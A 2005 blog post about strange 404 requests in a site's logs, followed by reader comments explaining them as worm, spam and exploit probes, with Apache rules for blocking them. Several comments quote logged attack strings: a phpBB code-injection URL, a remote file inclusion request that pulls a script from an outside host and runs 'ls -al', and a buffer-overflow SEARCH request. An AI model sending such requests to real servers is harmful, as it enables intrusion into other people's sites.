404 oddities

When I look at the server logs – or rather the list of “Required but not found URLs” that AWStats creates – for this site I find an increasing amount of very strange requests for nonexistent files. Since these weird requests are repeated over and over I’m guessing most of them are from bots looking for potential ways of hacking the site or posting spam.

That’s just a guess – I don’t know for sure what it’s all about. I’ve Googled around a bit and found reasonable explanations for some of the requests, but not all of them. Please fill me in if you know more about any of these oddities.

/cgi-bin/awstats.pl
Looking for a security hole in AWStats?
/awstats/awstats.pl
Probably the same as /cgi-bin/awstats.pl.
/_vti_bin/owssvr.dll
Requested by a “Web discussions” feature in IE/Win and probably by some worms looking for servers running Microsoft software. There are several discussions on this at Webmaster World.
/MSOffice/cltreq.asp
Same as /_vti_bin/owssvr.dll.
/_vti_inf.html
Someone trying to access the site with Frontpage?
/robotsxx.txt
Maybe you were looking for robots.txt?
/robot.txt
No, it’s robots with an ‘s’.
/333333, /444444, /666666
I think *every* document on this site has been requested multiple times with /333333, /444444 or /666666 added at the end of the URL. What are they looking for?
/css/{link}
No idea what this is.
/css/%7blink%7d
Nope, you won’t find any `blink` elements here.
abcdefghijklmn.htm
Umm?
/feed_main.xml^en^456
What’s with the circumflexes?
/favicon
You’ll have more luck if you add a file extension to that.

Have you found any other goodies in your server logs? Maybe something much weirder than any of the ones I’ve mentioned? Let’s compare!

Posted on April 5, 2005 in Web General

Comments

  1. hum…it’s happened with me too. But i have no idea what is this =/

  2. I get most of those too, but this one has me stumped: /333333, /444444, /666666

    What is that all about? I also get ‘/sumthin’. I (jokingly) figured it was some wiseass telling me to post something useful.

  3. I get all of the above, and also /avatar.png for some reason. I have a blank robots.txt and a favicon.ico just because I was bored of seeing those two turn up in my 404s so often.

  4. There are a few weird security sites that show up when you Google for /333333

  5. If this is the first time you’ve looked at web server log files, I can see how this could be quite a suprise.

    Since the webserver logs every single request that comes in on port 80 and this port is probably the most widely used, you get a lot of crap in your log files.

    Most of the junk comes from zombie machines looking for other machines to infect, 99% of which are Windows machines.

    An “fresh install” of Windows XP/2000 is extremely unsafe to connect to the Internet (without a firewall) because there is literally a constant flow of virii trying their best to spread their seed, most of which takes advantage of the fact that lots of Windows machines have a web server running by default.

    That’s why it’s best to view your stats in a log analyzer, they exclude the bad requests from the reporting. I only open my log files if there is a problem or I’m trying to do some extra digging. My stats program (AWStats) reports the document requested that resulted in a 404 error, so I don’t need to look at the log to figure it out.

  6. I get a LOT of seemingly random English words at the ends of 404 errors, and for the life of me I can’t imagine how looking for “/noncapillary/” could be of any use to anyone.

    I’ve thought of leaving messages for web hosts in a bad request when a site doesn’t include contact info anywhere. But of course they’d have to actually read their logs to find it.

  7. Nice site Jough, thanks for that.

  8. I’ve noticed quite common request for /cgi-bin/formmail.cgi (or something alike, I could have missed the hyphen). Looking for security hole, apparently.

  9. April 5, 2005 by Roger Johansson (Author comment)

    Justin: I haven’t been checking the actual log files - I use AWStats. Guess I could have made that clear in the post. The requests I mentioned are a sample of the 404 errors that get logged. I’ve been wondering about some of them for quite some time so I thought I’d check what you people have to say on the matter.

  10. Hmm, that’s weird because I don’t see any of that type of stuff in my reporting (AWStats). Most of the sites I check the stats on are subdomains though, so maybe I should take a gander at the root domain stats to see what they look like, as I am sure they are full of this garbage.

    I was sure that the stats would filter out garbage, but possibly not from the 404 reports so you can better debug.

  11. I manage a site for Emmanuel College Students’ Union, and we get loads of requests designed to exploit a (now fixed) security hole in phpBB, a popular bit of forum code, which look like this:

    /forums/viewtopic.php?p=3014&highlight=%2527%252E system(chr(112)%252Echr(101)%252 Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)

    Initially I was surprised you hadn’t come across them, but it occurred to me that the crackers probably only hit you with the requests once they’ve established that you actually have a phpBB forum on the site.

  12. I get tons and tons of requests for inner pages of my sites with misspellings, for example http://www.numbera.com/rome/startegy/tools.aspx (note “startegy” instead of “strategy”), even though I can’t imagine anyone typing in a URL like that.

  13. I get the “/vtibin/owssvr.dll” and “MSOffice/cltreq.asp” but nothing else interesting. Something keeps trying to access some old Atom feed I haven’t had in a year.

  14. I get them all too… they’re all exploit attempts.

    My guess on the 33333, 44444, 666666 404’s is that they’re trying to exploit a known buffer overflow vulnerability. It’s probably from the NT 4 days, but I’m sure it still works on some out there.

  15. April 5, 2005 by Johan Schurer

    Usually many of those 404’s come from worms, script-kiddies, saved pages, overcurious people and so on.

    To tackle it I use the html-rewrite function in apache to rewrite all garbage 404’s to a 0 size file named /youhaveaworm (or what you like).

    Any further request is now logged in the access.log and the server ‘sends’ 0 bytes back saving bandwidth.

    The only downside is you have to collect and put them in your apache config.

  16. the formmail.cgi one is an older one where some hosts would have a default email script that spammers could (ab)use to mass mail.

    Other than that, my 404s have actually been looking pretty clean as of late…

  17. I found this site that explains some of the errors.

  18. I love to send small, freak notes to some geek friends throught fake mispelled URLs. Something like “you-are-so-sexy,Joe” or “dont-talk-to-my-girl-again,pal”. It’s fun if you can see your friend’s expression at the log analysis time. Unfortunally, it works only once. 8:*

  19. Have my share of these as well, especially requests for AWStats and phpbb. None of which have been installed on my server.

    I also get a lot of request for FrontPage related stuff. Mostly direct request for “/vtibin/vtiaut/fp30reg.dll”. Don’t know if it’s hack attempts or just misbehaving M$ software. Have had days with more than 100 requests for “vti_bin” related stuff, obviously a bit annoying…

    Lastly there’s the CodeRed variants with requests for either “/default.ida” or “/NULL.ida”. Although not nearly as numerous as the one above, it’s really annoying since it consumes a fair amount of bandwidth. Really makes me wish that people would look better after their computers…

  20. My personal view on some of these, including awstats, is attempts by advertisers/spammers to isolate sites with high viewership. Thus, their blog comment spam and other nefarious ways are more effective and possibly strike a larger audience.

    As a side comment, your example of “blink” as you called it:

    /css/%7blink%7d

    is actually the same /css/{link} just URL Encoded.

  21. April 6, 2005 by gollux

    /cgi-bin/awstats.pl Looking for a security hole in AWStats? /awstats/awstats.pl Probably the same as /cgi-bin/awstats.pl.

    Bingo on the Security hole in AWStats, make sure you’re up to the proper level. There was a Secunia notice on this.

  22. Details on the awstat exploit on ISC http://isc.sans.org/diary.php?date=2005-03-31 http://isc.sans.org/diary.php?date=2005-03-03 http://isc.sans.org/diary.php?date=2005-03-02

    First time i see infocon with a colour different of Green BTW (06:13:44 GMT Apr 06 2005)

  23. This post made me smile.

    :)

    Then again, involving oddities is generally amusing.

  24. April 6, 2005 by GrumpySimon

    Welcome to the ‘net folks. Most of these are likely to be some script kiddie scanning an ip range.

    However, both AWstats and PhpBB have had some major security holes discovered recently (last few months). Make sure you’ve upgraded all your software (and php as well to 4.3.10 at least).

    Peter Parkes: The phpBB exploit uses google to find vulnerable phpBB installations (IIRC it googles for a version number in the page footer).

    As for the vti_bin ones - I just get apache to forbid (403) any requests there.

    Another common scan to look out for is people checking to see if you’re an open proxy. This basically comes in as a request for a big website like www.microsoft.com, www.intel.com or an open proxy checker on www.helllabs.com.

    If anyone’s interested, I’ll post some Apache configuration directives to 403 them.

    —Simon

  25. April 6, 2005 by GrumpySimon

    More info:

    the abcdef… thing appears to be a scan from a bot in the Chinese ip range. It seems to be hammering sites looking for this page. Anyway, it doesn’t seem to obey robots.txt, so kill it.

    More info: ejhweb.com

    The robotsxx.txt is a bot: PlantyNetWebRobotV1, out of hinet.com in Taiwan, and obviously doesn’t obey bot rules. Ban it.

    —Simon

  26. I get lots of those as well, although I haven’t seen the numeric ones yet. Lots of attempts to find formmail scripts, but then again, I know quite well spammers have found my blog. :(

    I’ve had quite a few requests for /mobots.txt as well. A dyslexic spider? :)

  27. I have about the same as you do. Some other things that bug me.

    The first post I wrote in my blog get really hit(3 times as much as my most popular post) by robots, not sure why.

    Some hacker stuff:

    • /?p=http://www.geociNOTSPAMties.com/blackengine2004/ilustrator.txt?&cmd=ls%20-al

    • /phpmyadmin/css/phpmyadmin.css.php?lang=en-iso-8859-1&jsframe=right&jsisDOM=1

    Nice to see what people really are doing at your site, the worrying thing is that you can never be sure if they have hacked the server. If they are goog, they would remove all their trace in the logs. Hopefully this has not happened. :D

    PS. Had to add NOSPAM into the url so I could get around the spam filter on this blog.

  28. My site emails me with ‘broken links’—-404s where the referrer is my site.

    I see a lot of spoofed-referrer attempts for “/cgi-bin/formmail.pl”, and many, many variants (I don’t have a cgi-bin directory).

    The odd thing is that I rarely see requests for the same variant. Some examples: /cgi-bin/email_wm.cgi /cgi-bin/formmail.cgi /cgi-bin/cgiemail/form.mail /cgi-local/mail.cgi /cgi-bin/cgiemail/forms/order.txt

    …and so on

  29. The most common Script Kiddie attack/requests I tend to receive daily are: “/cgi-bin/formmail.pl” from Thailand, Mexico, Africa and such places though obviously they must think I am stupid if they are looking for that file there.

    Maybe they are short of money and would like a free spam-mail box. ;-)

    Yes, I have seen such oddness as “/vtibin/owssvr.dll” or “/MSOffice/cltreq.asp” from what appears to be MSIE 6.0 on NT on a all too regular basis.

    Also a few website site rippers get logged looking for weird directories on my Beck Site and last month a Novell Cache Server went berserk looking for a file I had sitting on my other server all along the thing was requesting every second for long periods of time…

    Some odd results come from Agents looking for image files I have commented out in my CSS files using: /* url(“image.jpg”);*/ now that is peculiar.

    I always tend to trace the IP ranges if they look suspect.

  30. I get this all the time on my FTP server also. I laugh at some of the attempted username and passwords they use.

  31. Inspired by this post, I went through my own server-logs and came over a lot of strange things. The top-five I assembled into a a blog post.

    One difference from Roger’s info is that my serverlogging-system prints out a few more things, for instance the IP-address and UA of the visitor.

  32. April 6, 2005 by Roger Johansson (Author comment)

    Charles: Ah, I missed that URL encoding. I guess “blink” stood out too much and caught my attention, eh ;-)

    For those suggesting that AWStats should be updated to plug the security hole: thanks, I have that covered, plus the AWStats directory is named something else and requires a login and password to access.

    Jens: Yeah sorry about that. It’s an unfortunate side-effect of the measures I’ve taken to prevent comment spam.

    GrumpySimon: Some of those Apache directives would be interesting, so please post them.

  33. A couple of suggestions, if you’re running Apache with some control over it:

    1. tag bad requests using SetEnvIf. E.g. from people without User-Agent strings, or with fishy ones, and common script-kiddie attacks like the ones you mention above.
    2. dump all these requests into a seperate log, so it’s not in your main log cluttering things up and skewing your statistics.
    3. deny the tagged requests access.
    4. set up a virtual host with ServerName and block all requests on that vhost. How many legitimate visitors are going to visit your site by IP address?

    This is how I do it. Works well for me. But then, my server is in my bedroom on a cable modem. Not so easy if you’re buying hosting from someone!

  34. Well, know (some of) those errors, too. Another popular phenomenon causing errors are IRI modifications, of course (when people are guessing an IRI - some people e.g. try to access a “de” path on http://uitest.com/en/check/, and it currently really draws in IRI hackers).

    However, I recommend to activate the “CheckSpelling” directive on Apache servers, which allows to correct some IRI spelling errors (for example, if someone forgets a letter or any character is just wrong). Simply add the following line to your .htaccess:

    CheckSpelling On

    Performance losses are usually minimal, but the benefits are high (happier users, happier error logs).

  35. I also get /sumthin. We get it from at least 3 different IP addresses 40 or 50 times a month usually in groups of 3 requests in close proximity.

    Give it up already - you are getting nuthin!

  36. /index.com? That’s an odd one…

  37. April 7, 2005 by SugarKane

    I get all the above and more. But, the ones that confuse me are things like: /pelikansio/makatea.htm …. the file name is correct but the directory does not exist and never has. I get a heap of these, with each non-existant directory having a nonsensical name. Who or what makes up these directory names?

  38. April 8, 2005 by GrumpySimon

    I use these commands in my httpd.conf. The first stops the CONNECT:1:3:3:7 attempt which is a scan to see if your server allows tunneling proxy servers (and is often used by spammers).

    The second forbids any access to /cgi-bin/ and /vtibin/. I don’t have anything in cgi-bin on my server, but you may need to allow this.

    You can modify these (change the location bit) to include anything else which is getting requested often.

    —Simon

    #Stops those dodgy CONNECT:1:3:3:7 Scans and 403's them
    
       
          Order Deny,Allow
          Deny from all
       
    
    
    # 403 all cgi-bin and _vti_bin requests
    
       Deny from all
    
    
       Deny from all
    
    
  39. April 8, 2005 by GrumpySimon

    Bah, eating my brackets.

    #Stops those dodgy CONNECT:1:3:3:7 Scans and 403's them
    <Location />
       <Limit CONNECT>
          Order Deny,Allow
          Deny from all
       </Limit>
    </Location>
    
    # 403 all cgi-bin and _vti_bin requests
    <Location "/cgi-bin">
       Deny from all
    </Location>
    <Location "/_vti_bin">
       Deny from all
    </Location>
    
  40. April 8, 2005 by Roger Johansson (Author comment)

    GrumpySimon: Thanks for sharing. I’ll take a look at implementing that to clean things up.

    Sorry about the preview eating your brackets. It’s a long-standing problem with Movabletype that I don’t know how to fix. I’d much appreciate any help with fixing that, so if anyone knows anything about it…

    And to whoever is having fun sending me nice little messages by requesting non-existent files: I keep an eye on the list of 404 errors to detect any broken links or other problems. I also tend to add a redirect if someone posts a broken link to one of of my articles in a forum or on a mailing list. That happens quite a lot, actually. I figure it’s better if I redirect those people to the document they are looking for instead of letting them end up on my 404 page. Getting rid of all the nonsense requests would make any such problems much easier to find.

  41. April 9, 2005 by Joonas

    In SugarKane’s example /pelikansio/makatea.htm, the directory name is in fact a Finnish word. Its meaning is ‘game folder’ so it would make sense if someone had a directory named just that. Perhaps these bots are ripping directory names from other people’s sites, although I can’t really find any sense in doing that.

  42. Some oddities from my own logs:

    • /feeds/rss%22%20type=application/rss+xml%20rel=alternate%3E%3CLINK%20title=
    • /quark/archives/C:\Folder\file.txt
    • /archives/2005/04/submit-it-and-google-tos-violations/ - I have extensionless files, not directories. These requests seem to be made by a spam harvester, so I don’t worry too much that they 404)
    • /gallery/css/rounded/Rounded%20Corners%20in%20CSS%20-%20Virtuelvis_files/top-right.png - some program seems to have problems with Save as.
    • /archives/http:
    • /feeds/bmrss%22%3ERSS%3C/A%3E)%3C/P%3E%0D%0A%3CH3%3E%3CA%20href= - most likely some attempt at using my feeds as a redirector, something which will fail horribly.
  43. The general css/{link} request can be a result of people exploring your css (I am guilty of this). In Safari you can open the activity viewer and double click a css file to view it. Safari opens the css file in a new window resulting in a direct request for said file; therefore the server records that as a request (just wanted to make it clear). There is a technique out there to hide css from direct access, I believe php was used and it would give a message like “thanks for taking interest in my css…”when you try to access it. But for the life of me or about 30 mins I can’t find the blog. The blog also features a content shadow technique that was impressive. Dark blue and red color scheme if anybody know ;-)

  44. April 11, 2005 by Stefano

    Maybe is due to some spam programs… When you get a 404 is displayed the email of the owner of the site.

  45. me too~!

  46. I’m running my webserver on a linux box, however that doesn’t stop all those skiddies from trying to get a ‘cmd.exe’ shell. Sadly, it isn’t just once or twice, it is HUNDREDS of times.

  47. Maybe is due to some spam programs… When you get a 404 is displayed the email of the owner of the site.

    This is an option in the Apache configuration. You can disable it for every Virtual Host or globally. The directive is named ServerSignature. Set it to On or Off instead of Email.

    I used to get a lot of request from hinet.com on port 25 but since I’ve blocked them they haven’t returned :=D

    Anyone ever come across this one though?

    [07/May/2005:11:55:46 +0100] “SEARCH /\x90\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9…

    It goes on for another 300 characters…

    [Edit: Removed a very long line. /Roger]

  48. I’ve noticed an entertaining 404 error in my logs recently: A robot of some sort is trying to access a valid URL, but they’ve surrounded one of the words in the file name with HTML markup. Thus far it’s only been the bold markup. I can write an .htaccess directive to strip the markup - should I?

Comments are disabled for this post (read why), but if you have spotted an error or have additional info that you think should be in this post, feel free to contact me.